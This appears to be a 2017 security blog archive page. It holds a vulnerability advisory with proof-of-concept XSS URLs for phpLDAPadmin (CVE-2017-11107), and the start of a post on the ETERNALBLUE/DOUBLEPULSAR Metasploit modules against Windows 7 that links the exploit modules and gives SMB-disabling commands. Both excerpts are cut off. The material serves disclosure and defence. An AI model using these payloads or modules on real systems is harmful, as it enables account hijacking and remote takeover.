
Showing posts from 2017

Hijacking phpLDAPadmin account using a Cross-site scripting vulnerability (CVE-2017-11107)

Software Description

phpLDAPadmin is a web-based LDAP administration interface for viewing and manipulating LDAP information.

Vulnerability Description

The $request['form'] and $request['rdn'] parameters in the file htdocs/entry_chooser.php aren't properly sanitized before being displayed to the user, which allows a remote attacker to inject arbitrary HTML/JavaScript code in a user's context. This vulnerability, if successfully exploited, can lead to data manipulation or information leakage, as demonstrated in this PoC video.

Proof of Concept (PoC)

XSS via the 'form' parameter:

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form%22).base;%27);}%20alert(1);%20function%20lol()%20{%20isNaN(%27&element=base&rdn=test

XSS via the 'rdn' parameter (needs Chrome's XSS Auditor bypass):

http://localhost:8888/phpldapadmin/entry_chooser.php?form=advanced_search_form&element=base&rdn=test%22%

Pwning Windows 7 with ETERNALBLUE & DOUBLEPULSAR (Metasploit)

Thanks to @UnaPibaGeek & @pablogonzalezpe for their efforts to develop the Metasploit modules.

Modules can be found here (Scanner + Exploit):

https://packetstormsecurity.com/files/142181/Microsoft-Windows-MS17-010-SMB-Remote-Code-Execution.html
https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit

This vulnerability affects Windows 2000, Windows XP, Windows 7, Windows 8, and Windows Server 2000 up to 2012 R2.

How to protect yourself

If you still haven't updated your system, you should probably do it right away. If for some reason you aren't able to apply updates, consider disabling SMB protocols.

To disable SMBv1, SMBv2 and SMBv3 under Windows 8 and Windows Server 2012, run the following cmdlets (PowerShell commands):

Set-SmbServerConfiguration -EnableSMB1Protocol $false
Set-SmbServerConfiguration -EnableSMB2Protocol $false

For Windows 7, Windows Server 2008 R2, Windows Vista, and Windows Server 2008, you should use these:

Set-Ite